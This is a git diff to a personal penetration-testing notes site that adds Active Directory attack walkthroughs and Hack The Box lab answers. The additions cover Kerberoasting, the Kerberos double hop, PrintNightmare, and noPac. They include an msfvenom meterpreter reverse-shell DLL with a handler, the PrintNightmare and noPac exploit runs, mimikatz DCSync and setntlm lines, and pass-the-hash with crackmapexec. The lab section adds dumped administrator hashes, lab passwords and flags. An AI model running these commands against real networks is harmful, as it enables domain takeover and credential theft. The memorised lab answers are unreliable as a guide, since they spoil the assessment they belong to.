Kerberoasting tools typically request RC4 encryption when performing the attack - RC4 (type 23) encryption: TGS  hashes that begin with `$krb5tgs$23$*` - AES-256 (type 18) encryption: TGS  hashes that begin with `$krb5tgs$18$*` -#### setspn.exe +### setspn.exe **1.** Enumerating SPNs with setspn.exe @@ -119,7 +119,7 @@ hashcat -m 13100 ServiceName_tgs_hashcat /usr/share/wordlists/rockyou.txt If we decide to skip the base64 output with Mimikatz and type `mimikatz # kerberos::list /export`, the .kirbi file (or files) will be written to disk. In this case, we can download the file(s) and run `kirbi2john.py` against them directly, skipping the base64 decoding step. -#### PowerView +### PowerView Let's use PowerView to extract the TGS tickets and convert them to Hashcat format. @@ -154,7 +154,7 @@ Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\FileN ``` -#### Rubeus +### Rubeus [See more about Rubeus](rubeus.md). @@ -228,7 +228,7 @@ hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt -#### Mitigating Kerberoasting +### Mitigating Kerberoasting Kerberoasting requests Kerberos TGS tickets with RC4 encryption, which should not be the majority of Kerberos activity within a domain. When Kerberoasting is occurring in the environment, we will see an abnormal number of TGS-REQ and TGS-REP requests and responses, signaling the use of automated Kerberoasting tools. @@ -241,6 +241,102 @@ omain controllers can be configured to log Kerberos TGS ticket requests by selec Some other remediation steps include restricting the use of the RC4 algorithm, particularly for Kerberos requests by service accounts. This must be tested to make sure nothing breaks within the environment. Furthermore, Domain Admins and other highly privileged accounts should not be used as SPN accounts (if SPN accounts must exist in the environment). +### Kerberos: Forging the PAC + +This was a flaw in the Kerberos protocol, which could be leveraged along with standard domain user credentials to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation. + +The vulnerability allowed a forged PAC to be accepted by the KDC as legitimate. It can be exploited with tools such as the [Python Kerberos Exploitation Kit (PyKEK)](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) or the Impacket toolkit. + + +### ❗ Kerberos Constrained Delegation [PENDING] + +### ❗ Kerberos Unconstrained Delegation [PENDING] + +### ❗ Kerberos Resource-Based Constrained Delegation (RBCD) [PENDING] + + +### Kerberos "Double Hop" Problem + +**Kerberos "Double Hop" Problem**: The "Double Hop" problem often occurs when using WinRM/Powershell or Evil-WinRM, since the default authentication mechanism only provides a ticket to access a specific resource (winrm). When we use Kerberos to establish a remote session, we are not using a password for authentication, and the user's ticket-granting service (TGS) ticket is sent to the remote service, but the TGT ticket is not sent. Therefore, when we try to authenticate over a second resource, the machine can not pull any hash from memory or generate any TGS to authenticate us. + +In a nutshell, **Kerberos "Double Hop" Problem** arises when we try to issue a multi-server command, our credentials will not be sent from the first machine to the second, as the user's password was never cached as part of their login. In other words, when authenticating to the target host, the user's ticket-granting service (TGS) ticket is sent to the remote service, which allows command execution, but the user's TGT ticket is not sent. When the user attempts to access subsequent resources in the domain, their TGT will not be present in the request, so the remote service will have no way to prove that the authentication attempt is valid, and we will be denied access to the remote service. + +Example once we are connected with Evil-WinRm: + +```shell-session +*Evil-WinRM* PS C:\Users\backupadm\Documents> import-module .\PowerView.ps1 + +|S-chain|-<>-127.0.0.1:9051-<><>-172.16.8.50:5985-<><>-OK +|S-chain|-<>-127.0.0.1:9051-<><>-172.16.8.50:5985-<><>-OK +*Evil-WinRM* PS C:\Users\backupadm\Documents> get-domainuser -spn +Exception calling "FindAll" with "0" argument(s): "An operations error occurred. +" +At C:\Users\backupadm\Documents\PowerView.ps1:5253 char:20 ++ else { $Results = $UserSearcher.FindAll() } ++ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + + FullyQualifiedErrorId : DirectoryServicesCOMException +``` + +However this does not happen with DRP connections, whereas our TGT is sent during the authentication process to obtain a service ticket for the RDP session. It is then cached on the remote host for subsequent use. This allows seamless access to domain resources from the remote host. + +#### Workaround #1: unconstrained delegation + +If *unconstrained delegation* is enabled on a server, it is likely we won't face the "Double Hop" problem. In this scenario, when a user sends their TGS ticket to access the target server, their TGT ticket will be sent along with the request. The target server now has the user's TGT ticket in memory and can use it to request a TGS ticket on their behalf on the next host they are attempting to access. + +#### Workaround #2: Evil-WinRM and PSCredential Object + + We can use a "nested" Invoke-Command to send credentials (after creating a PSCredential object) with every request. + +```powershell +# Set up: we are connected to the host machine from our attacker machine via Evil-WinRM +# 1. We create a SecureString Object with our creds +$SecPassword = ConvertTo-SecureString '$password' -AsPlainText -Force +# Example: +# $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force + +$Cred = New-Object System.Management.Automation.PSCredential('$domain\$userSamAccountName', $SecPassword) +# Example: +# $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword) + +# 2. Import PowerView module and embed creds in all commands. In the example we are requesting the Service Principals. If we try without specifying the `-credential` flag, we get an error message. +import-module .\PowerView.ps1 +get-domainuser -spn -credential $Cred | select samaccountname +``` + +#### Workaround #3: Win-RM and Register PSSession Configuration + +>Note: We cannot use `Register-PSSessionConfiguration` from an evil-winrm shell because we won't be able to get the credentials popup. Furthermore, if we try to run this by first setting up a PSCredential object and then attempting to run the command by passing credentials like `-RunAsCredential $Cred`, we will get an error because we can only use `RunAs` from an elevated PowerShell terminal. Therefore, this method will not work via an evil-winrm session as it requires GUI access and a proper PowerShell console. Furthermore, in our testing, we could not get this method to work from PowerShell on a Parrot or Ubuntu attack host due to certain limitations on how PowerShell on Linux works with Kerberos credentials. + +```powershell +# Establish a WinRM session on the remote host. +Enter-PSSession -ComputerName $hostName.$domain -Credential $domain\$user +# Example +# Enter-PSSession -ComputerName ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL -Credential inlanefreight\backupadm +``` + +Due to the double hop problem, we can only interact with resources in our current session but cannot access the DC directly using PowerView. One trick we can use here is registering a new session configuration using the [Register-PSSessionConfiguration](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/register-pssessionconfiguration?view=powershell-7.2) cmdlet. + +```powershell +# REgister a new session +Register-PSSessionConfiguration -Name $SessionName -RunAsCredential $domain\$userSamAccountName +# Example: +# Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm + +# Once this is done, we need to restart the WinRM service. From the PS session: +Restart-Service WinRM +# This will kick us out, so we'll start a new PSSession using the named registered session we set up previously. + +# After we start the session, we can see that the double hop problem has been eliminated. +Enter-PSSession -ComputerName $hostName -Credential $domain\$userSamAccountName -ConfigurationName $sessionName +# Example: +# Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess + +# We can now run tools such as PowerView without having to create a new PSCredential object. For example: +get-domainuser -spn | select samaccountname +``` + + ## 🛂 Access Control List (ACL)Abuse @@ -387,6 +483,8 @@ runas /$TargetUser:[domain\$TargetUser] cmd.exe We can also use mimikatz: ```powershell +.\mimikatz.exe +privilege::debug lsadump::setntlm ``` @@ -656,6 +754,7 @@ And now, from powershell: ######### # mimikatz command ######## + lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator ``` @@ -747,7 +846,6 @@ Enter-PSSession -ComputerName $hostName -Credential $cred # Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred ``` - ### SQL Server Admin Enumerate via Bloodhound and the `SQLAdmin` edge. We can check for `SQL Admin Rights` in the `Node Info` tab for a given user or use this custom Cypher query to search: @@ -794,7 +892,152 @@ xp_cmdshell whoami /priv ``` >Finally, we can run commands in the format `xp_cmdshell `. Here we can enumerate the rights that our user has on the system and see that we have [SeImpersonatePrivilege](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege), which can be leveraged in combination with a tool such as [JuicyPotato](https://github.com/ohpe/juicy-potato), [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), or [RoguePotato](https://github.com/antonioCoco/RoguePotato) to escalate to `SYSTEM` level privileges, depending on the target host, and use this access to continue toward our goal. -> + + +## 🖨️ PrintNightmare + +`PrintNightmare` is the nickname given to two vulnerabilities ([CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) and [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675)) found in the [Print Spooler service](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-prsod/7262f540-dd18-46a3-b645-8ea9b59753dc) that runs on all Windows operating systems. + +We will be using [cube0x0's](https://twitter.com/cube0x0?lang=en) exploit. + +```bash +git clone https://github.com/cube0x0/CVE-2021-1675.git +``` + +For this exploit to work successfully, we will need to use cube0x0's version of Impacket: + +```bash +pip3 uninstall impacket +git clone https://github.com/cube0x0/impacket +cd impacket +python3 ./setup.py install +``` + +Enumerating for MS-RPRN: + +```bash +# We can use rpcdump.py to see if Print System Asynchronous Protocol and Print System Remote Protocol are exposed on the target. +rpcdump.py @$DomainControllerIP | egrep 'MS-RPRN|MS-PAR' +# Example: +# rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR' +``` + +After confirming this, we can proceed with attempting to use the exploit. We can begin by crafting a DLL payload using msfvenom. + +```bash +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IPhost LPORT=8080 -f dll > $FileName.dll +# Example: +# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll +``` + +We will then host this payload in an SMB share we create on our attack host using smbserver.py. + +```bash +# Creating a Share with smbserver.py +sudo smbserver.py -smb2support $ShareName /path/to/$FileName.dll +# Example: +# sudo smbserver.py -smb2support CompData /home/ +# This will leave out terminal in the host machine with no other use than that of sharing. +``` + +Then we will need to open a two new terminals in our attacker machine: + +```bash +# In the first terminal we will configure ant start a MSF multi/handler +msfconsole -q +use exploit/multi/handler +set PAYLOAD windows/x64/meterpreter/reverse_tcp +set LHOST 172.16.5.225 +set LPORT 8080 +run +``` + +```bash +# In the second terminal we will connect via ssh with the host machine: +ssh $user@$ip + +# Then we run the exploit: +sudo python3 /opt/CVE-2021-1675/CVE-2021-1675.py $user/$user:$password@$domainControllerIP '\\$ipHostMachine\$ShareName\$filename.dll' +# Example: +# sudo python3 /opt/CVE-2021-1675/CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll' +``` + +The payload will then call back to our multi handler giving us an elevated SYSTEM shell. + + +## 🪤 NoPac (SamAccountName Spoofing) + +!!! tips "Detailed explanations" + - [noPac: A Tale of Two Vulnerabilities That Could End in Ransomware](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware). + - [SAM Name impersonation](https://techcommunity.microsoft.com/users/daniel%20naim/164126). + +This vulnerability encompasses two CVEs [2021-42278](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278) and [2021-42287](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287), allowing for intra-domain privilege escalation from any standard domain user to Domain Admin level access in one single command. + +| 42278 | 42287 | +| -------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------- | +| `42278` is a bypass vulnerability with the Security Account Manager (SAM). | `42287` is a vulnerability within the Kerberos Privilege Attribute Certificate (PAC) in ADDS. | + +```bash +# Ensuring Impacket is Installed +git clone https://github.com/SecureAuthCorp/impacket.git + +python setup.py install + +# Cloning the NoPac Exploit Repo +git clone https://github.com/Ridter/noPac.git +``` + +Once Impacket is installed and we ensure the repo is cloned to our attack box, we can use the scripts in the NoPac directory to check if the system is vulnerable using a scanner (scanner.py) then use the exploit (noPac.py) to gain a shell as NT AUTHORITY/SYSTEM. + + +```bash +# First we will scan: +sudo python3 scanner.py $domain/$userSamAccounName:$password -dc-ip $domainControllerIP -use-ldap +# Example: +# sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap +``` + +We will obtain the `ms-DS-MachineAccountQuota` number. If it is set to 0, the attack will not work. + +```bash +# Running NoPac & Getting a semi-interactive shell session  using smbexec.py -https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py. This could be "noisy" or may be blocked by AV or EDR. +sudo python3 noPac.py $domain/$user:$password -dc-ip $domainControllerIP -dc-host $hostname -shell --impersonate $userAdmin -use-ldap +# Example: +# sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap +``` + +Important: It is important to note that NoPac.py does save the TGT in the directory on the attack host where the exploit was run (We can use `ls` to confirm). + +```bash +# We could then use the cache file to perform a pass-the-ticket and perform further attacks such as DCSync. Using noPac to DCSync the Built-in Administrator Account +sudo python3 noPac.py $domain/$user:$password -dc-ip $domainControllerIP -dc-host $hostname --impersonate $userAdmin -use-ldap -dump -just-dc-user $domain/$userAdmin +# Example: +# sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator + +# We can also dump all +sudo python3 noPac.py $domain/$user:$password -dc-ip $domainControllerIP -dc-host $hostname --impersonate $userAdmin -use-ldap -dump -just-dc +# Example: +# sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc +``` + +### Mitigations + +**If opsec or being "quiet" is a consideration during an assessment, we would most likely want to avoid a tool like smbexec.py.** + +If Windows Defender (or another AV or EDR product) is enabled on a target, our shell session may be established, but issuing any commands will likely fail. + +The first thing smbexec.py does is create a service called `BTOBTO`. Another service called `BTOBO` is created, and any command we type is sent to the target over SMB inside a .bat file called `execute.bat`. With each new command we type, a new batch script is created and echoed to a temporary file that executes said script and deletes it from the system. Let's look at a Windows Defender log to see what behavior was considered malicious. + +## 💱 Exchange Related Group Membership + +**See some techniques at:** [https://github.com/gdedrouas/Exchange-AD-Privesc](https://github.com/gdedrouas/Exchange-AD-Privesc) +This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security. This is a side project of AD-Control-Paths, an AD permissions auditing project to which I recently added some Exchange-related modules. + +- The group `Exchange Windows Permissions` is not listed as a protected group, but members are granted the ability to write a DACL to the domain object. +- The Exchange group `Organization Management` is another extremely powerful group (effectively the "Domain Admins" of Exchange) and can access the mailboxes of all domain users. It is not uncommon for sysadmins to be members of this group. This group also has full control of the OU called `Microsoft Exchange Security Groups`, which contains the group `Exchange Windows Permissions`. + +If we can compromise an Exchange server, this will often lead to Domain Admin privileges. + ## Evasion Techniques diff --git a/docs/adidnsdump.md b/docs/adidnsdump.md new file mode 100644 index 000000000..c106e4c1d --- /dev/null +++ b/docs/adidnsdump.md @@ -0,0 +1,30 @@ +--- +title: adidnsdump - A tool for enumerating DNS records in Active Directory +author: amandaguglieri +draft: false +TableOfContents: true +--- + +# adidnsdump - A tool for enumerating DNS records in Active Directory + +By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. + +## Installation + +The tool requires `impacket` and `dnspython` to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install [impacket from GitHub](https://github.com/CoreSecurity/impacket). + +```bash +git clone https://github.com/dirkjanm/adidnsdump +cd adidnsdump +pip install . +``` + +## Basic commands + +Installation adds the `adidnsdump` command to your `PATH`. For help, try `adidnsdump -h`. The tool can be used both directly from the network and via an implant using proxychains. If using proxychains, make sure to specify the `--dns-tcp` option. + +```bash +adidnsdump -u $domain\\$user ldap://$DomainControllerIP +# Example: +# adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 +``` \ No newline at end of file diff --git a/docs/cpts-cheat-sheet.md b/docs/cpts-cheat-sheet.md index 39d72a199..206592391 100644 --- a/docs/cpts-cheat-sheet.md +++ b/docs/cpts-cheat-sheet.md @@ -14,37 +14,37 @@ tags: ### Basic Tools -|**Command**|**Description**| -|---|---| -|**General**|| -|`sudo openvpn user.ovpn`|Connect to VPN| -|`ifconfig`/`ip a`|Show our IP address| -|`netstat -rn`|Show networks accessible via the VPN| -|`ssh user@10.10.10.10`|SSH to a remote server| -|`ftp 10.129.42.253`|FTP to a remote server| -|**tmux**|| -|`tmux`|Start tmux| -|`ctrl+b`|tmux: default prefix| -|`prefix c`|tmux: new window| -|`prefix 1`|tmux: switch to window (`1`)| -|`prefix shift+%`|tmux: split pane vertically| -|`prefix shift+"`|tmux: split pane horizontally| -|`prefix ->`|tmux: switch to the right pane| -|**Vim**|| -|`vim file`|vim: open `file` with vim| -|`esc+i`|vim: enter `insert` mode| -|`esc`|vim: back to `normal` mode| -|`x`|vim: Cut character| -|`dw`|vim: Cut word| -|`dd`|vim: Cut full line| -|`yw`|vim: Copy word| -|`yy`|vim: Copy full line| -|`p`|vim: Paste| -|`:1`|vim: Go to line number 1.| -|`:w`|vim: Write the file 'i.e. save'| -|`:q`|vim: Quit| -|`:q!`|vim: Quit without saving| -|`:wq`|vim: Write and quit| +| **Command** | **Description** | +| ------------------------ | ------------------------------------ | +| **General** | | +| `sudo openvpn user.ovpn` | Connect to VPN | +| `ifconfig`/`ip a` | Show our IP address | +| `netstat -rn` | Show networks accessible via the VPN | +| `ssh user@10.10.10.10` | SSH to a remote server | +| `ftp 10.129.42.253` | FTP to a remote server | +| **tmux** | | +| `tmux` | Start tmux | +| `ctrl+b` | tmux: default prefix | +| `prefix c` | tmux: new window | +| `prefix 1` | tmux: switch to window (`1`) | +| `prefix shift+%` | tmux: split pane vertically | +| `prefix shift+"` | tmux: split pane horizontally | +| `prefix ->` | tmux: switch to the right pane | +| **Vim** | | +| `vim file` | vim: open `file` with vim | +| `esc+i` | vim: enter `insert` mode | +| `esc` | vim: back to `normal` mode | +| `x` | vim: Cut character | +| `dw` | vim: Cut word | +| `dd` | vim: Cut full line | +| `yw` | vim: Copy word | +| `yy` | vim: Copy full line | +| `p` | vim: Paste | +| `:1` | vim: Go to line number 1. | +| `:w` | vim: Write the file 'i.e. save' | +| `:q` | vim: Quit | +| `:q!` | vim: Quit without saving | +| `:wq` | vim: Write and quit | ### Pentesting diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md index f5bad519c..d25b42f4a 100644 --- a/docs/cpts-labs.md +++ b/docs/cpts-labs.md @@ -3764,6 +3764,96 @@ xp_cmdshell type C:\Users\damundsen\Desktop\flag.txt Results: 1m_the_sQl_@dm1n_n0w! +**Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)** + +Results: 2021-42278&2021-42287 + + +**Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop.** + +``` +# Add this line to the proxychains file /etc/proxychains +socks5 127.0.0.1 1234 + +# Establish a tunnel connection +ssh htb-student@$ip -D 1234 + +# Now from my attacker machine, test the NoPac vulnerability. First we will run an scanner from the host machine: +sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap +``` + +It will return: + +```bash +# it will save the file administrator_ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.ccache +[*] Current ms-DS-MachineAccountQuota = 10 +[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484 +[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663 + ``` + +We could then use the cache file to perform a pass-the-ticket and perform further attacks such as DCSync. Using noPac to DCSync the Built-in Administrator Account: + +```bash +sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator +``` + +It will return: + +``` +[*] Using the DRSUAPI method to get NTDS.DIT secrets +inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf::: +[*] Kerberos keys grabbed +inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6 +inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25 +inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f +``` + +whereas the NTLM hash is 88ad09182de639ccc6579eb0849751cf. Now we can use crackmapexec (for instance): + +``` +proxychains crackmapexec smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf -x 'type C:\Users\Administrator\Desktop\DailyTasks\flag.txt' --exec-method smbexec +``` + +Results: D0ntSl@ckonN0P@c! + + +**RDP to  (ACADEMY-EA-MS01) ,10.129.32.8 (ACADEMY-EA-ATTACK01) with user "htb-student" and password "Academy_student_AD!". Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".** + +``` +Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol +``` + +Results: ygroce + + + **Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.** + +``` +# Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser +Import-Module .\PowerView.ps1 +Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl + +# Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth. +.\Rubeus.exe asreproast /user:ygroce /nowrap /format:hashcat + +# Cracking the Hash Offline with Hashcat: +hashcat -m 18200 ygroce /usr/share/wordlists/rockyou.txt +``` + +Results: Pass@word + +### Why So Trusting? + +Question + +``` + +``` + +Results: + + + Question ``` diff --git a/docs/hashcat.md b/docs/hashcat.md index 4b47badbc..b8c78948a 100644 --- a/docs/hashcat.md +++ b/docs/hashcat.md @@ -180,4 +180,4 @@ hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt ``` - +### Module 18200: kerberos asrep diff --git a/docs/powershell.md b/docs/powershell.md index a7675d3c4..012ebb33c 100644 --- a/docs/powershell.md +++ b/docs/powershell.md @@ -66,9 +66,12 @@ Copy-Item nameOfSource nameOfDestiny cp originFolder destinyPath -Recurse Copy-Item originFolder destinyPath -Recurse -# Get running processes filtered by name +# Way 1: Get running processes filtered by name get-process -name ccSvcHst +# Way 2: Get running processes filtered by the string +tasklist /V |findstr backupadm + # Kill processes called ccSvcHst* // Notice here wild card * taskkill /f /im ccSvcHst* diff --git a/mkdocs.yml b/mkdocs.yml index b0bb211cb..78b060092 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -13,6 +13,7 @@ nav: - 7z: 7z.md - active directory powershell module: activedirectory-powershell-module.md - ADB: android-debug-bridge.md + - adidnsdump: adidnsdump.md - amass: amass.md - apktool: apktool.md - aquatone: aquatone.md @@ -694,6 +695,8 @@ theme: - content.code.select - search.suggest - search.highlight + - codehilite + - code-blocks icon: logo: material/alpha-h-box admonition: @@ -759,6 +762,7 @@ markdown_extensions: anchor_linenums: true line_spans: __span pygments_lang_class: true + linenums: true # Enable line numbers for code block - pymdownx.inlinehilite - pymdownx.snippets - pymdownx.tasklist: